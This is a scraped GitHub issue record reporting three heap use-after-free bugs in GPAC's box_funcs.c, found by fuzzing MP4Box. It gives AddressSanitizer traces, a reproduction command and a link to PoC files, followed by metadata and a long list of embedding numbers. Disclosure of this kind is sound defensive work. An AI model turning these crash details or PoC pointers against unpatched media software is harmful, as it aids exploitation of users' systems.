/home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #17 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #18 0xae3444 in moov_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3749 #19 0x6c7764 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #20 0x6c7764 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #21 0x6c7fb4 in gf_isom_parse_root_box /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:42 #22 0x6dd940 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:207 #23 0x6e05d3 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:195 #24 0x6e05d3 in gf_isom_open_file /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:616 #25 0x43375d in mp4boxMain /home/dungnguyen/fuzz/gpac/applications/mp4box/main.c:4814 #26 0x7fca8b87382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #27 0x41e4f8 in _start (/home/dungnguyen/PoCs/gpac_new/MP4Box+0x41e4f8) 0x60400000dde8 is located 24 bytes inside of 48-byte region [0x60400000ddd0,0x60400000de00) freed by thread T0 here: #0 0x7fca8c61732a in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9832a) #1 0x6c5f9f in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1512 previously allocated by thread T0 here: #0 0x7fca8c617662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662) #1 0xadb68d in esds_New /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:1287 SUMMARY: AddressSanitizer: heap-use-after-free /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 gf_isom_box_del ~~~
3 UAF bugs in box_funcs.c
https://api.github.com/repos/gpac/gpac/issues/1440/comments
4
2020-03-24T17:16:05
2020-03-26T19:28:46Z
https://github.com/gpac/gpac/issues/1440
587,134,103
1,440
true
This is a GitHub Issue repo:gpac owner:gpac Title : 3 UAF bugs in box_funcs.c Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi GPAC Team, I found 3 new UAF bugs on the lastest commit 56eaea8 of GPAC version 0.8.0. I think it is probably due to **an imcomplete fix** of the UAF bug https://github.com/gpac/gpac/issues/1340. Actually, these new bugs share the same buggy function which is `gf_isom_box_del()` in src/isomedia/box_funcs.c with https://github.com/gpac/gpac/issues/1340, but have different alloc function `esds_New()` in `src/isomedia/box_code_base.c` (instead of `stco_New()`). Command: `MP4Box -info $POC` or `MP4Box -diso $POC` #### 1) UAF Bug 1 PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_56eaea8/uaf1 ASAN says: ~~~ ================================================================= ==31565==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400000dde8 at pc 0x0000006c601e bp 0x7fff726c3b70 sp 0x7fff726c3b60 READ of size 8 at 0x60400000dde8 thread T0 #0 0x6c601d in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 #1 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #2 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #3 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #4 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #5 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #6 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #7 0x6c5f5e in gf_isom_box_array_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:272 #8 0x6c5f5e in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1520 #9 0x6c72cd in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1427 #10 0xae0b0f in mdia_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3021 #11 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #12 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #13 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #14 0xaeffe8 in trak_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:7188 #15 0x6c6456 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #16 0x6c6456 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #17 0x6c6e02 in gf_isom_box_array_read_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1425 #18 0xae3444 in moov_Read /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:3749 #19 0x6c7764 in gf_isom_box_read /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1532 #20 0x6c7764 in gf_isom_box_parse_ex /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:210 #21 0x6c7fb4 in gf_isom_parse_root_box /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:42 #22 0x6dd940 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:207 #23 0x6e05d3 in gf_isom_parse_movie_boxes /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:195 #24 0x6e05d3 in gf_isom_open_file /home/dungnguyen/fuzz/gpac/src/isomedia/isom_intern.c:616 #25 0x43375d in mp4boxMain /home/dungnguyen/fuzz/gpac/applications/mp4box/main.c:4814 #26 0x7fca8b87382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #27 0x41e4f8 in _start (/home/dungnguyen/PoCs/gpac_new/MP4Box+0x41e4f8) 0x60400000dde8 is located 24 bytes inside of 48-byte region [0x60400000ddd0,0x60400000de00) freed by thread T0 here: #0 0x7fca8c61732a in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9832a) #1 0x6c5f9f in gf_isom_box_del /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1512 previously allocated by thread T0 here: #0 0x7fca8c617662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662) #1 0xadb68d in esds_New /home/dungnguyen/fuzz/gpac/src/isomedia/box_code_base.c:1287 SUMMARY: AddressSanitizer: heap-use-after-free /home/dungnguyen/fuzz/gpac/src/isomedia/box_funcs.c:1504 gf_isom_box_del ~~~ --- end body ---
5,052
[ -0.03261517360806465, 0.025413647294044495, -0.01833115518093109, -0.015236284583806992, 0.019238784909248352, 0.02757112868130207, -0.04913106560707092, 0.041572440415620804, 0.007766934111714363, 0.029698852449655533, -0.0037421148736029863, -0.004471194930374622, 0.02648494765162468, 0.00839929934591055, -0.010036010295152664, -0.019313180819153786, 0.004363320767879486, 0.048416867852211, 0.006026069633662701, -0.0050775217823684216, 0.024818480014801025, -0.053981680423021317, -0.028954893350601196, 0.05442805588245392, 0.004374480340629816, 0.004430277273058891, 0.0042108092457056046, 0.00991697609424591, 0.013554937206208706, 0.015757055953145027, -0.004114094655960798, 0.02429770864546299, -0.00900934636592865, 0.02816629596054554, 0.030918944627046585, -0.01706642471253872, 0.04389359429478645, 0.07076539844274521, 0.002802866278216243, 0.022690756246447563, -0.011382576078176498, -0.05427926406264305, -0.04276277497410774, 0.014410490170121193, -0.001778062549419701, 0.03088918700814247, 0.011092431843280792, 0.006186021026223898, -0.013331749476492405, 0.008771278895437717, 0.026633739471435547, -0.003853708738461137, -0.01897096075117588, -0.05541008338332176, 0.03499584272503853, -0.03398405760526657, 0.04472682997584343, 0.005282110534608364, 0.004980807192623615, 0.01651589572429657, -0.001048982492648065, 0.007699978072196245, -0.006052108481526375, 0.02843412198126316, 0.018554342910647392, 0.007945484481751919, 0.004828295204788446, 0.001952892984263599, -0.0004254516679793596, 0.01770623028278351, 0.002456925343722105, -0.040382105857133865, -0.0138748399913311, 0.03948935493826866, 0.018866805359721184, -0.028999529778957367, 0.03889418765902519, 0.03121652826666832, -0.011680159717798233, 0.04088800027966499, -0.03044281154870987, 0.030189866200089455, -0.011501609347760677, 0.02202119305729866, 0.02416379563510418, 0.016620049253106117, -0.03502560034394264, -0.08189503103494644, -0.014023631811141968, -0.030294019728899002, -0.004556750413030386, 0.010430308058857918, 0.01847994700074196, -0.019313180819153786, 0.009730986319482327, 0.002224438125267625, -0.028865618631243706, -0.0021295833867043257, -0.0526127964258194, 0.0026968521997332573, -0.02516070008277893, -0.016024881973862648, -0.007722296752035618, 0.009187896735966206, 0.008748960681259632, 0.010861804708838463, 0.025086304172873497, -0.01775086671113968, -0.018271638080477715, 0.1271277517080307, 0.027898471802473068, 0.014871745370328426, -0.01715569943189621, 0.015444593504071236, 0.019938107579946518, 0.010817167349159718, -0.008183551020920277, -0.00969378836452961, -0.0395786315202713, -0.012877934612333775, 0.012275326997041702, -0.005341627169400454, 0.0015492950333282351, 0.026693256571888924, -0.04389359429478645, 0.048535898327827454, -0.004910130985081196, 0.0011233784025534987, -0.019938107579946518, -0.0032975992653518915, -0.039697665721178055, -0.018405551090836525, -0.0021760808303952217, -0.030561845749616623, -0.003678878303617239, -0.0017027367139235139, -0.005624331533908844, 0.043298427015542984, 0.017319370061159134, 0.02392572909593582, -0.06915844976902008, -0.028538275510072708, 0.02402988262474537, -0.008503453806042671, -0.02852339670062065, -0.018212120980024338, 0.002771248109638691, 0.005869838409125805, -0.022913943976163864, -0.02202119305729866, -0.0010647916933521628, -0.04234616085886955, 0.021485542878508568, 0.02356862835586071, 0.06475421041250229, 0.010884123854339123, 0.027362819761037827, 0.047256290912628174, -0.004184770863503218, 0.0005491349147632718, -0.004407958593219519, -0.030948704108595848, 0.00438935961574316, -0.04187002405524254, -0.043387703597545624, -0.0515117384493351, 0.014045950025320053, 0.020815979689359665, -0.012863054871559143, 0.020815979689359665, 0.008793598040938377, -0.013807883486151695, 0.04600643739104271, 0.05496370792388916, -0.04826807603240013, -0.02938639000058174, 0.015094933100044727, 0.02502678893506527, -0.023092495277523994, -0.006591478828340769, 0.004865493159741163, 0.021500421687960625, -0.0018533883849158883, 0.0052077146247029305, 0.016530774533748627, -0.02548804320394993, 0.018405551090836525, -0.04353649541735649, 0.008436497300863266, -0.028865618631243706, 0.013897158205509186, -0.0009764464921317995, 0.02438698336482048, 0.00346313021145761, 0.04469706863164902, 0.0032027445267885923, -0.008250507526099682, -0.0017427244456484914, 0.006465005688369274, 0.01760207489132881, 0.016367102041840553, -0.010430308058857918, 0.0031134693417698145, 0.00591447576880455, -0.037108685821294785, -0.018346033990383148, 0.007115969900041819, 0.040114279836416245, -0.0023899690713733435, 0.01089900266379118, -0.01611415669322014, -0.031960487365722656, 0.020682066679000854, 0.017185458913445473, -0.015861211344599724, 0.010341033339500427, -0.028002625331282616, -0.00887543335556984, -0.030368415638804436, -0.00996161438524723, 0.014120345935225487, 0.009329249151051044, 0.013517739251255989, -0.020905254408717155, -0.02480360120534897, -0.025354130193591118, 0.02856803499162197, 0.005509017966687679, -0.054070957005023956, -0.008890313096344471, 0.022854426875710487, 0.00076209323015064, 0.009143258444964886, 0.009879778139293194, -0.004359601065516472, -0.004021099768579006, 0.0006142313359305263, 0.010928761214017868, -0.013428463600575924, 0.011836390942335129, -0.012587790377438068, 0.022363414987921715, -0.022467568516731262, -0.01770623028278351, 0.013056484051048756, 0.080466628074646, -0.006208339706063271, -0.010512144304811954, -0.02475896291434765, 0.03568028286099434, 0.0277496799826622, -0.030591603368520737, -0.019491732120513916, 0.009864899329841137, 0.012595229782164097, 0.0046981023624539375, 0.01693251170217991, 0.007391234859824181, -0.020057139918208122, -0.04139389097690582, -0.003636100795120001, 0.007208964787423611, -0.021812884137034416, 0.007878527976572514, 0.013941795565187931, -0.026008814573287964, 0.0005161217413842678, 0.013220155611634254, -0.023910850286483765, -0.01810796745121479, 0.03612665832042694, -0.0006649135611951351, -0.0324961394071579, -0.01066837552934885, -0.0015995122957974672, 0.020101778209209442, -0.019863711670041084, 0.01883704774081707, -0.0053527867421507835, -0.002090525347739458, 0.0035710043739527464, 0.00996161438524723, 0.005490418989211321, 0.015459472313523293, 0.006159982178360224, -0.00036756234476342797, -0.005687568336725235, -0.006863024085760117, -0.0007383795455098152, 0.0051965550519526005, 0.01961076445877552, 0.015801694244146347, -0.02902928926050663, 0.00281588570214808, 0.00982770137488842, 0.029044168069958687, 0.00562061183154583, 0.0049733673222362995, -0.03234734758734703, 0.009589634835720062, 0.016129035502672195, 0.010735332034528255, -0.045024413615465164, -0.0061153448186814785, -0.03079991228878498, 0.023464474827051163, -0.037555061280727386, 0.004244287498295307, -0.019402457401156425, 0.027675284072756767, 0.025651713833212852, -0.04469706863164902, -0.03820974752306938, -0.02739257924258709, -0.03550173342227936, -0.007588384207338095, -0.008867993950843811, -0.032049763947725296, -0.02834484726190567, 0.0182418804615736, -0.018122846260666847, -0.006762589327991009, -0.004590228199958801, 0.028047263622283936, 0.04198905825614929, 0.00041661717114038765, -0.002810305915772915, 0.017735987901687622, -0.06386145949363708, 0.0013809743104502559, 0.0000010679883644115762, -0.013569816015660763, 0.01264730654656887, -0.023732298985123634, 0.0017910818569362164, -0.023122252896428108, -0.027868712320923805, 0.025874901562929153, 0.032972272485494614, -0.013182957656681538, 0.002174220746383071, 0.029698852449655533, 0.011918227188289165, -0.0034780094865709543, -0.0340435728430748, -0.01656053215265274, -0.005475539714097977, -0.011858710087835789, -0.0021128442604094744, -0.003515207441523671, 0.001072231214493513, 0.029996436089277267, 0.005791722796857357, 0.054219748824834824, 0.03335913270711899, -0.0239852461963892, -0.010378231294453144, -0.011270982213318348, 0.030680878087878227, 0.015578506514430046, 0.002769388258457184, -0.006658434867858887, -0.009931855835020542, 0.03285323828458786, 0.0072052450850605965, 0.010140163823962212, 0.011561126448214054, 0.007878527976572514, 0.01651589572429657, -0.008615047670900822, -0.050618987530469894, 0.06457565724849701, -0.03594810888171196, -0.0010620018001645803, -0.010489825159311295, -0.008592729456722736, 0.031781937927007675, 0.033835265785455704, -0.04404238611459732, 0.004240567795932293, -0.03344840556383133, -0.016887875273823738, 0.040203556418418884, -0.05142246186733246, -0.01264730654656887, 0.03154386952519417, -0.031246287748217583, 0.07594335824251175, -0.002817745553329587, -0.03258541226387024, -0.05478515848517418, 0.038150228559970856, -0.003954143263399601, -0.038923945277929306, -0.0211135633289814, 0.019417336210608482, -0.0426735021173954, -0.027452096343040466, -0.021917039528489113, -0.0391322560608387, 0.020458878949284554, 0.007990121841430664, -0.03225807100534439, 0.02257172204554081, -0.010802287608385086, 0.04317939281463623, 0.001988230971619487, 0.004705542232841253, 0.04877396672964096, -0.0006188810802996159, 0.015414834953844547, -0.015310680493712425, -0.012624988332390785, 0.009760744869709015, 0.048387106508016586, 0.0064017693512141705, -0.006636116188019514, 0.032972272485494614, -0.037108685821294785, 0.01996786519885063, -0.0023304522037506104, 0.000996905378997326, 0.003314338391646743, 0.005955393426120281, 0.025398768484592438, 0.02648494765162468, -0.029371509328484535, 0.00716804713010788, 0.028404362499713898, -0.028880497440695763, 0.016218310222029686, 0.002825185190886259, -0.006773748900741339, 0.012022380717098713, -0.0105567816644907, -0.02620224468410015, -0.05169028788805008, -0.034698259085416794, -0.012855615466833115, -0.01987859047949314, -0.003275280585512519, 0.033329375088214874, 0.00201240973547101, 0.00492501026019454, 0.0028344846796244383, -0.05047019571065903, -0.012833296321332455, 0.008734080940485, 0.0030353537295013666, -0.03386502340435982, 0.0022076989989727736, -0.0044860742054879665, -0.0006053968099877238, 0.0048803724348545074, 0.007982682436704636, -0.013324310071766376, -0.017825262621045113, -0.013078803196549416, 0.03243662044405937, 0.015147009864449501, 0.006405489053577185, 0.04618499055504799, -0.004891532007604837, 0.008213309571146965, 0.016441497951745987, 0.035055357962846756, -0.0001690182398306206, -0.038745395839214325, 0.00996161438524723, -0.022869305685162544, 0.01888168603181839, 0.037465788424015045, 0.00875640008598566, 0.0031227688305079937, 0.002051467541605234, 0.02248244732618332, 0.015757055953145027, -0.020101778209209442, -0.021128442138433456, -0.03618617728352547, -0.0009266941924579442, -0.007811571937054396, 0.003632380859926343, 0.014001312665641308, 0.008503453806042671, -0.027466975152492523, -0.01788477972149849, 0.009024225175380707, 0.010564221069216728, -0.006022349931299686, 0.015325560234487057, 0.005092401057481766, -0.0025220217648893595, 0.0029404987581074238, 0.024089399725198746, -0.02657422423362732, -0.010869244113564491, -0.007071332540363073, 0.01828651688992977, 0.0014553702203556895, 0.01751280017197132, -0.01464855670928955, 0.013770685531198978, 0.0077966926619410515, 0.02843412198126316, -0.033686473965644836, -0.01897096075117588, 0.01956612803041935, 0.011055233888328075, -0.027065236121416092, -0.01030383538454771, -0.025726109743118286, 0.014291456900537014, -0.037019409239292145, -0.020860616117715836, -0.02330080233514309, 0.004991966299712658, 0.010251757688820362, 0.025904661044478416, 0.009292050264775753, -0.020488636568188667, -0.01592072658240795, -0.02179800532758236, 0.03219855576753616, 0.029326872900128365, 0.01137513667345047, -0.0014925681753084064, 0.007056453265249729, 0.04413166269659996, -0.009812822565436363, -0.015682660043239594, -0.007729736156761646, -0.03279372304677963, 0.008101715706288815, -0.008741521276533604, -0.014871745370328426, 0.006591478828340769, 0.05567790940403938, -0.006468725390732288, -0.0234347153455019, -0.0499643012881279, 0.044607795774936676, -0.027318183332681656, 0.005237473174929619, -0.013688849285244942, 0.03972742334008217, -0.002678253222256899, 0.030770152807235718, -0.011955425143241882, 0.015117251314222813, -0.00839185994118452, -0.004586508497595787, -0.015935607254505157, 0.013592135161161423, 0.009730986319482327, -0.013383826240897179, -0.013480541296303272, 0.012290206737816334, 0.017006907612085342, 0.004936169367283583, 0.015771934762597084, 0.0036751586012542248, 0.011129629798233509, -0.007365196477621794, 0.0008755470043979585, 0.002732190303504467, -0.007301959674805403, 0.040203556418418884, -0.04463755339384079, -0.01444768812507391, 0.009887218475341797, 0.0025220217648893595, 0.023910850286483765, -0.009835140779614449, -0.017408646643161774, -0.00935156736522913, -0.0013326170155778527, -0.010036010295152664, -0.012505954131484032, -0.0313950777053833, -0.010184802114963531, -0.050172608345746994, -0.026499828323721886, 0.014782469719648361, 0.01609927788376808, -0.0333888903260231, 0.00048682832857593894, 0.01397155411541462, 0.0014841986121609807, -0.01828651688992977, 0.006000031251460314, 0.005356506444513798, -0.015489230863749981, -0.023092495277523994, 0.01601000316441059, -0.005029164254665375, -0.00960451364517212, -0.00958219449967146, 0.00286610284820199, -0.0038499890360981226, -0.027675284072756767, 0.03463874012231827, 0.008615047670900822, -0.04169147461652756, -0.025175580754876137, 0.017230095341801643, 0.023553749546408653, -0.001574403722770512, -0.02361326664686203, 0.006784908007830381, 0.03017498552799225, 0.011278421618044376, 0.04871445149183273, -0.008540651760995388, 0.015280922874808311, -0.01030383538454771, 0.032377105206251144, 0.011561126448214054, -0.012014941312372684, 0.041423648595809937, 0.030294019728899002, -0.03791216388344765, 0.0031078895553946495, -0.01076508965343237, 0.007182926405221224, 0.03243662044405937, 0.019134631380438805, -0.011806633323431015, -0.011866149492561817, -0.002592697972431779, -0.02475896291434765, 0.022274138405919075, 0.01253571268171072, -0.016143914312124252, -0.03657303377985954, 0.02001250348985195, 0.024000125005841255, 0.01194798480719328, -0.03261517360806465, -0.0072052450850605965, 0.007357756607234478, -0.0005826130509376526, -0.03300203010439873, 0.03612665832042694, -0.022095588967204094, 0.007506548427045345, -0.009277171455323696, 0.002957237884402275, 0.0010926901595667005, 0.036513518542051315, -0.03202000632882118, -0.02730330266058445, -0.004370760638266802, 0.014827107079327106, 0.02949054352939129, -0.016545653343200684, 0.03386502340435982, 0.03079991228878498, -0.0014125925954431295, -0.02739257924258709, -0.012260448187589645, -0.029103685170412064, -0.028835859149694443, -0.015109811909496784, -0.02966909483075142, -0.02394060790538788, -0.03240686282515526, 0.0002627106150612235, -0.005773123819380999, 0.016233190894126892, 0.0009606373496353626, 0.0015837032115086913, 0.019089993089437485, -0.005464380607008934, -0.004407958593219519, -0.038150228559970856, -0.0038834670558571815, -0.0005161217413842678, -0.03817998617887497, -0.04228664189577103, 0.0014907083241268992, -0.006624957080930471, 0.006762589327991009, 0.02520533837378025, -0.02074158377945423, 0.016947390511631966, -0.006691913120448589, -0.00190825539175421, -0.013004407286643982, -0.024639928713440895, 0.040798723697662354, -0.00982770137488842, 0.01574217714369297, 0.019268544390797615, -0.004783657845109701, -0.022497326135635376, 0.009500359185039997, 0.002172360895201564, 0.0020719263702630997, -0.008265387266874313, -0.02702059969305992, -0.005702447611838579, -0.00839185994118452, -0.0340435728430748, 0.026053452864289284, 0.032644931226968765, -0.0032064642291516066, 0.014849426224827766, 0.020994529128074646, -0.008845674805343151, 0.0018682676600292325, 0.014745271764695644, -0.025220217183232307, 0.010229439474642277, 0.005553655792027712, -0.0069411396980285645, 0.0007002516067586839, 0.004832015372812748, -0.005795442499220371, 0.025086304172873497, 0.009589634835720062, -0.02611296810209751, -0.010750210843980312, -0.034787531942129135, 0.0020589071791619062, -0.012982088141143322, 0.0044228374026715755, 0.012096776627004147, -0.020399361848831177, 0.014365852810442448, 0.004712981637567282, -0.0417807511985302, 0.021083803847432137, 0.010928761214017868, -0.007275921292603016, -0.015340439043939114, -0.006479884963482618, -0.01651589572429657, -0.0033273575827479362, 0.03606714308261871, -0.0015372057678177953, 0.010943640023469925, -0.003033493645489216, -0.0333888903260231, -0.006584038957953453, 0.0015892828814685345, 0.014514644630253315, -0.017096182331442833, -0.04139389097690582, 0.030561845749616623, 0.01064605638384819, 0.026425432413816452, 0.013368947431445122, -0.012565471231937408, -0.003171126125380397, -0.015310680493712425, 0.035591010004282, 0.0085108932107687, -0.012684504501521587, -0.021232595667243004, -0.006037229206413031, 0.01992322877049446, -0.012937450781464577, 0.006539401598274708, -0.006598918233066797, -0.022809790447354317, -0.006736550945788622, -0.021589696407318115, 0.02865730971097946, 0.014001312665641308, 0.03553149104118347, -0.02684204839169979, -0.017631834372878075, -0.001995670609176159, 0.028136538341641426, -0.010177361778914928, 0.012833296321332455, -0.0021705010440200567, 0.0019305741880089045, 0.0021928197238594294, -0.027422336861491203, 0.003148807445541024, -0.0634448453783989, 0.007848769426345825, 0.015139570459723473, 0.0019212746992707253, 0.029788127169013023, -0.0055238972418010235, -0.017914537340402603, 0.011471850797533989, 0.009879778139293194, -0.010363351553678513, 0.040292833000421524, -0.03446019068360329, -0.03520414978265762, -0.020220812410116196, 0.009507798589766026, 0.015355318784713745, -0.02047375775873661, -0.02270563505589962, 0.00391322560608387, -0.008949829265475273, -0.014350973069667816, -0.048416867852211, -0.01961076445877552, -0.015995122492313385, -0.01053446251899004, 0.037882402539253235, -0.013160638511180878, 0.012587790377438068, 0.0018803569255396724, 0.007647900842130184, 0.030338658019900322, 0.005594573449343443, 0.010928761214017868, 0.004062017425894737, 0.025220217183232307, 0.001958472654223442, -0.017899658530950546, 0.025651713833212852, -0.034281641244888306, 0.004288924857974052, 0.002535040955990553, -0.05332699790596962, 0.014596479944884777, -0.020280327647924423, 0.008384420536458492, 0.018003813922405243, 0.04234616085886955, 0.019804194569587708, -0.002994435839354992, -0.01019224151968956, -0.006989496760070324, 0.006398049183189869, -0.0024904035963118076, 0.016262948513031006, 0.01503541599959135, 0.0122158108279109, -0.004143852740526199, 0.036007627844810486, -0.01312344055622816, -0.030383294448256493, 0.005505298264324665, -0.01906023547053337, -0.0036175018176436424, -0.0288507379591465, -0.007871088571846485, -0.0016525194514542818, 0.005003125872462988, -0.004471194930374622, 0.009269732050597668, 0.015816573053598404, 0.0010620018001645803, 0.024104278534650803, -0.011538807302713394, 0.01444768812507391, 0.0012823997531086206, -0.007900847122073174, 0.0263063982129097, 0.0008146353648044169, 0.017051545903086662, 0.01205957867205143, -0.013592135161161423, 0.0020737864542752504, 0.006580319255590439, 0.00887543335556984, -0.005133318714797497, -0.06386145949363708, 0.0017882919637486339, -0.0290739256888628, -0.030829669907689095, -0.028374604880809784, -0.00006777003727620468, 0.01788477972149849, -0.02489287592470646, -0.019283423200249672, 0.014373292215168476, -0.013071363791823387, 0.021872401237487793, 0.01638198271393776, -0.006836985237896442, -0.006703072693198919, 0.015228845179080963, 0.02456553280353546, 0.016322465613484383, -0.03672182559967041, 0.004686943255364895, -0.03088918700814247, -0.019863711670041084, -0.0025629394222050905, 0.0012647307012230158, 0.011836390942335129, -0.057582445442676544, -0.018033571541309357, 0.029773248359560966, 0.028731705620884895, -0.022601481527090073, -0.005475539714097977, -0.030859429389238358, -0.022720513865351677, -0.015310680493712425, -0.010906442068517208, 0.004285205155611038, -0.03434115648269653, -0.030502328649163246, 0.0059963115490973, 0.02620224468410015, -0.0068258256651461124, -0.008488574996590614, 0.03663255274295807, -0.002495983149856329, -0.011709918268024921, -0.02894001454114914, -0.039340563118457794, -0.01019224151968956, 0.0040657371282577515, -0.04695870727300644, 0.007394954562187195, 0.006182301323860884, 0.046333782374858856, 0.03416260704398155, -0.01678371988236904, -0.022631239145994186, 0.020548153668642044, -0.014440248720347881, -0.007811571937054396, -0.02307761460542679, 0.003234362695366144, 0.0061041852459311485, 0.009388765320181847, -0.009775624610483646, -0.027779437601566315, -0.012773780152201653, 0.011434652842581272, 0.03172242268919945, 0.006130224093794823, -0.031514111906290054, -0.012386920861899853, 0.014135225676000118, -0.03416260704398155, -0.013540057465434074, 0.03630521148443222, 0.021559938788414, 0.006978337652981281, -0.019938107579946518, 0.010958519764244556, -0.004240567795932293, -0.03303179144859314, -0.0101699223741889, -0.029996436089277267, -0.021559938788414, -0.02147066406905651, -0.014477446675300598, -0.016411740332841873, -0.034103091806173325, 0.02097965031862259, -0.024148916825652122, 0.0012731002643704414, -0.0037662936374545097, 0.03511487692594528, 0.015444593504071236, 0.01642661914229393, -0.011509048752486706, -0.002821465255692601, 0.008867993950843811, 0.008131474256515503, -0.03490656614303589, 0.0016748382477089763, -0.03193072974681854, 0.00491385068744421, -0.016367102041840553, 0.0035598448012024164, 0.015199086628854275, 0.021039167419075966, 0.0018217700999230146, 0.0324961394071579, 0.0015864931046962738, -0.04163195937871933, -0.01837579347193241, 0.006948579102754593, -0.007908286526799202, -0.0075623453594744205, 0.009128379635512829, -0.030651120468974113, -0.024446500465273857, -0.02175336703658104, 0.023271044716238976, 0.014990778639912605, -0.014544403180480003, -0.0013716748217120767, 0.018762651830911636, 0.006762589327991009, 0.008682004176080227, -0.06073683127760887, 0.003403613343834877, -0.006989496760070324, -0.00402481947094202, -0.031008221209049225, -0.01810796745121479, -0.022036071866750717, -0.0238810908049345, 0.005148197989910841, 0.012223250232636929, 0.008934950456023216, -0.024833358824253082, -0.01399387326091528, 0.010690693743526936, 0.006472445093095303, -0.027511611580848694, -0.002179800532758236, -0.01638198271393776, -0.015280922874808311, 0.020905254408717155, 0.007752055302262306, 0.008711762726306915, -0.02179800532758236, -0.038507331162691116, 0.017453283071517944, 0.0032566816080361605, 0.0369301363825798, -0.02548804320394993, -0.0019696319941431284, -0.0052077146247029305, 0.021559938788414, 0.022556843236088753, 0.024461379274725914, -0.0016646087169647217, -0.009567315690219402, 0.00819099135696888, 0.02193191833794117, 0.004936169367283583, 0.018405551090836525, 0.0027954268734902143, 0.002862383145838976, -0.02456553280353546, -0.012438998557627201, 0.010244318284094334, -0.012520833872258663, 0.0006565439980477095, 0.00803475920110941, 0.03472801670432091, 0.013316869735717773, -0.04314963519573212, -0.018420429900288582, -0.02803238295018673, 0.007789253257215023, 0.013837642036378384, 0.02461017109453678, 0.006197180133312941, -0.01410546712577343, 0.0277496799826622, -0.009195336140692234, 0.06064755469560623, -0.015355318784713745, -0.013435903936624527, -0.0004561399982776493, -0.003232502844184637, -0.015905847772955894, -0.0007235003286041319, 0.0010833906708285213, 0.0012796098599210382, -0.012543152086436749, 0.018807290121912956, -0.05192835256457329, -0.02020593173801899, -0.029148321598768234, 0.012037260457873344, -0.00007044363883323967, 0.002187240170314908, 0.011598324403166771, 0.012982088141143322, 0.009835140779614449, -0.024223312735557556, -0.00729080056771636, 0.01934294030070305, -0.03389478102326393, 0.0016515895258635283, -0.02106892503798008, 0.007599543314427137, -0.01865849830210209, -0.009678909555077553, -0.031514111906290054, -0.0015130271203815937, 0.029550060629844666, -0.040233314037323, 0.019804194569587708, 0.02456553280353546, -0.02966909483075142, 0.018584100529551506, -0.009559876285493374, -0.01934294030070305, -0.022422930225729942, 0.0058921570889651775, -0.006684473715722561, -0.04457803815603256, -0.005371385719627142, 0.009321808815002441, 0.07838354259729385, 0.009336688555777073, 0.008376981131732464, -0.018137725070118904, 0.0009727266733534634, 